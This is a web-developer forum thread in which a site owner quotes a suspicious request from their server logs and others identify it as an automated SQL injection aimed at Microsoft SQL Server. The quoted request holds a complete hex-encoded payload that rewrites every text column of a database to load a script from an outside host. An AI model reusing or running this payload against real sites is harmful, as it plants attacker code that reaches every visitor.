SitePoint Sponsor

User Tag List

Results 1 to 6 of 6
  1. #1
    SitePoint Zealot
    Join Date
    Jan 2002
    Posts
    111
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    What is this person trying to do?

    I noticed some odd url requests in my server logs today:

    Code:
    http://site.com/page.php?%27;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
    Any idea what this is trying to do? Some sort of injection attack?

  2. #2
    SitePoint Addict Evan2all's Avatar
    Join Date
    Sep 2004
    Location
    Dhaka, Bangladesh
    Posts
    201
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)


    is there any submit query running in that page???
    Shajed Zaman
    Web 2.0 holic, Small Business Website Designer, Pro Blogger
    SME DEVELOPERS, creative design solution|
    I AM WEBSITE DEVELOPER|Twitt Me

  3. #3
    SitePoint Author silver trophybronze trophy
    wwb_99's Avatar
    Join Date
    May 2003
    Location
    Washington, DC
    Posts
    10,635
    Mentioned
    4 Post(s)
    Tagged
    0 Thread(s)
    There is an automated SQL injection attack that is aimed at MSSQL, and that is one example of said attack. If you have things properly secured you don't have anything to worry about.

  4. #4
    SitePoint Zealot
    Join Date
    Jan 2002
    Posts
    111
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by Evan2all View Post


    is there any submit query running in that page???
    Not a form submit, but a variable is taken from the url to query the mysql db to list things.

    I sanitize the input using a php open source class.

    Thanks guys. My site has been steadily climbing the popularity ranks and i'm starting to see more of these types of things. I had and iframe injection attack the other day on an improperly secured comment form. D'oh!

  5. #5
    SitePoint Zealot
    Join Date
    Aug 2008
    Posts
    195
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Ban this site, it sounds like attack

  6. #6
    SitePoint Member
    Join Date
    Jul 2007
    Posts
    19
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    It's an automated SQl injection attack. I've been seeing this one in logs recently. Most likely a blind attempt at MS SQL server. Won't work against MySQL as PHP's interface doesn't support multiple queries function call (notice the semicolons in that query - trying to execute more than one at a time).


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •